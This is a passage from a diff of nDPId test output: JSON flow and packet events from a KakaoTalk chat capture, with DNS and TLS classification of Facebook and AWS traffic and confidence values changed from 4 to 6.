OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +01034{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., 
CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1430069031221,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":144,"pkt_l4_len":108,"thread_ts_msec":1430069031221,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAIDtrgAANREvLgq8AQEKGFK8ADUPsQBsjjKJ\/4GAAAEAAwAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAAA+oABwRzdGFywBfANQAFAAEAAAPqAAwEc3RhcgRjMTBywBfASAABAAEAAAAIAAQfDURU"} -00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069031221,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} 
+00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069031221,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1430069031230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":87,"pkt_l4_len":51,"thread_ts_msec":1430069031230,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEcAAEAAQBHSFQoYUrwKvAEBOToANQAzWvOyogEAAAEAAAAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAAB"} 
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031236,"flow_last_seen":1430069031236,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031236,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1430069031236,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031236,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxjDkAAPwYYeQoYUrwfDURUsJsBu8tPaEMAAAAAoAI5CF29AAACBAV4BAIICgALC00AAAAAAQMDBw=="} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHLtrwAANREvOwq8AQEKGFK8ADU5OgBeI2eyooGAAAEAAQAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAABwAwADAABAAAEYQAfEG1xdHQtc2h2LTE0LWZyYzEIZmFjZWJvb2sDY29tAA=="} 
-00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069031281,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069031281,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACw2WEAA+AaMPh8NRFQKGFK8Abuwm2JwnlDLT2hEYBIRHOBVAAACBAV4"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1430069031284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031284,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChjD0AAPwYYjAoYUrwfDURUsJsBu8tPaERicJ5RUBA5CM\/qAAA="} -00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01039{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01039{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7580000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1430069031611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":113,"pkt_l4_len":77,"thread_ts_msec":1430069031611,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGHTnUAAQAbVXgoYUrw2\/\/3H5i8UZ+uf0VkGiXPCgBgCYxkQAAABAQgKAAKTKDTnT0kXAwEAKNOo\/lFrrxEtj1oyrBEybZXAvF7754xqLjvuYfV0gCpDpumAA3\/lW60="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7580000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7580000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035398,"flow_last_seen":1430069035398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069035398,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1430069035398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChV8UAAQAbFkwoYUrzSZ\/APpVwBu+YrTKNirTiWUBFpAB9mAAA="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1430069035537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035537,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkaUAAjgapG9Jn8A8KGFK8AbulXGKtOJbmK0ykUBCkj3bOAAA="} 
@@ -158,21 +158,21 @@ 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1430069035840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035840,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADytk0AAPwbN8woYUrwfDURUkrUAUM0qoIsAAAAAoAI5CEEgAAACBAV4BAIICgALDRgAAAAAAQMDBw=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1430069035877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069035877,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxm7kAA+AZbqB8NRFQKGFK8AFCStWTibgPNKqCMYBIRHPNeAAACBAV4"} 